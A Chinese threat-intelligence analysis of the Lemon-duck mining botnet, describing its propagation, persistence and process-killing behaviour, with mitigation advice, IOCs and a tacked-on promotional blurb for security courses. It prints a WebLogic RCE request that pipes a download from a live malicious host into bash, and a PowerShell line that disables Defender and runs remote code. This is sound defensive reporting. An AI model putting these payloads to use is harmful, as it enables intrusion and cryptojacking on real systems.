赞
踩
近日,阿里云安全监测到利用多种方式传播的僵尸网络Lemon-duck持续活跃,该僵尸网络不仅利用永恒之蓝漏洞、RDP暴力破解、SSH暴力破解、MS-
SQL暴力破解、Redis未授权访问、Hadoop未授权访问等进行扫描入侵,同时变种集成WebLogic未授权访问远程命令执行漏洞进行互联网传播,并通过SMB、NTLM进行横向移动,从而实现挖矿、后门远控等功能,对主机、用户资产危害极大。
阿里云安全持续对该僵尸网络进行监控,发现近期传播有所上升,提醒广大用户注意防护。
Lemon-duck通过多个服务暴力破解、未授权访问远程命令执行及横向移动等进行传播,其路径如图所示。
Lemon-duck新增WebLogic未授权访问远程命令执行模块,Lemon-duck入侵WebLogic应用之后会通过URL:
t.bb3u9.com/ln/core.png?logic 下载bash脚本并执行
GET /console/images/%2E%2E%2Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec(new String[]{'/bin/sh','-c','export src=logic;curl -fsSL t.bb3u9.com/ln/core.png?logic|bash'});"); HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: curl/7.55.1
Accept: */*
Content-Type:application/x-www-form-urlencoded; charset=utf-8
通过SSH暴力破解、RDP暴力破解等入侵会执行如下命令
cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:windowssystem32WindowsPowerShellv1.0powershell.exe&powershell IEX(New-Object Net.WebClient).DownloadString("http://t.bb3u9.com/rdp.jsp
如下我们针对入侵Linux、Windows平台后的行为进行分析。
Linux平台下Lemon-
duck入侵后会下载名为core.png的bash脚本,作用是下载核心bash脚本和将失陷主机传送到远程C&C端,并通过crontab做持久化。
通过known_hosts中携带的主机信息进行传播,下载名为core.png的bash脚本,同时将本地主机信息上报远控端。
localgo函数中会通过conifg、history文件、进程、配置文件等获取用户、端口、rsa密钥等进而批量尝试传播。
通过 u s e r l i s t 、 userlist、 userlist、hostlist、 k e y l i s t 、 keylist、 keylist、sshports即用户名列表、主机列表、密钥列表、SSH端口列表的遍历对外进行传播。
脚本中主要函数功能总结如下
核心powershell脚本文件经过三层的混淆,经过三次反混淆后得到可读的Powershell文件,文件包含了收集失陷主机信息、下载脚本、二进制文件,进行C&C通信等功能。如图所示Lemon-
duck收集失陷主机的系统、网卡、CPU等信息。
并通过params参数拼接上述各类系统信息,发送至C&C。
需要下载的文件包含if.bin和kr.bin文件,其中两个为powershell脚本。
对上述if.bin(md5:
0261b30c6773e4c04987bbe5090ba685)的powershell文件进行反混淆处理,可以看到如图所示文件包含了核心的传播模块,包含RDP、SSH、Redis、SMB、Yarn、WebLogic的命令模块。
通过各个函数模块进行调用,例如调用logicexec进行WebLogic未授权访问远程命令执行
通过powerdump模块dump本地hash
脚本中还集成了弱密码表
检测本地是否存在mimikatz和plink文件,如果没有通过下载路径进行下载
脚本中主要函数功能总结如下
对上述kr.bin(md5:
b7a1cfd74661361f71856388dac5aaa6)的powershell文件进行反混淆处理,该文件主要功能为建立一个守护进程角色持续进行监控。如图所示程序持续监控
其中getprotected通过路径匹配m6g.bin.exe和m6.bin.exe的挖矿文件来获取进程ID,用于保护自身挖矿进程
ProcessSuspend用于将进程暂停
Killer是核心功能函数,Lemon-duck会遍历进程,通过匹配名单结束名单中的进程,例如 Windows_update, Windows
Managers,Oracle Java
Update等进程,同时会杀死其他挖矿程序进程诸如MinerGate,minerd,Carbon,javaupd等,还会通过netstat遍历外联IP然后中断连接。
1)避免将远程服务SSH、RDP暴露给全网,建议通过策略区域放行或对特定IP放行,针对未修复的漏洞及时软件升级或配置升级,同时开启四层、七层漏洞防护、虚拟补丁功能。
2)云防火墙针对暴力破解、扫描、挖矿行为、数据库等云上高危危害针对性防护,对于Lemon-
duck利用多种方式,如四层网络协议中SSH暴力破解、RDP暴力破解、MS-
SQL暴力破解、MS17-010漏洞,七层网络协议中Redis未授权访问远程命令执行、Hadoop
Yarn未授权访问远程命令执行、WelLogic未授权访问远程命令执行等,都可以轻松的通过一键开启IPS防护模块进行防御。如图云防火墙概览页中场景提供了以上场景的历史数据。
Domain
t.bb3u9.com
t.pp6r1.com
p.b69kq.com
d.u78wjdu.com
t.zer9g.com
d.cu38l.com
d.ttr3p.com
URL
hxxp://d.u78wjdu.com/ln/xr.zip
hxxp://d.u78wjdu.com/m6.bin?redacted
IP
170.187.149.77
138.68.186.90
176.58.99.231
138.68.251.24
165.227.62.120
202.182.120.192
MD5
a.asp: 576e06f3b4d78e6d0ab462da0eb70238 (bash shell)
ifbin: 0261b30c6773e4c04987bbe5090ba685 (powershell)
krbin: b7a1cfd74661361f71856388dac5aaa6 (powershell)
a.asp: 576e06f3b4d78e6d0ab462da0eb70238 (bash shell)
ifbin: 0261b30c6773e4c04987bbe5090ba685 (powershell)
krbin: b7a1cfd74661361f71856388dac5aaa6 (powershell)
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
干货主要有:
①1000+CTF历届题库(主流和经典的应该都有了)
②CTF技术文档(最全中文版)
③项目源码(四五十个有趣且经典的练手项目及源码)
④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)
⑤ 网络安全学习路线图(告别不入流的学习)
⑥ CTF/渗透测试工具镜像文件大全
⑦ 2023密码学/隐身术/PWN技术手册大全
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。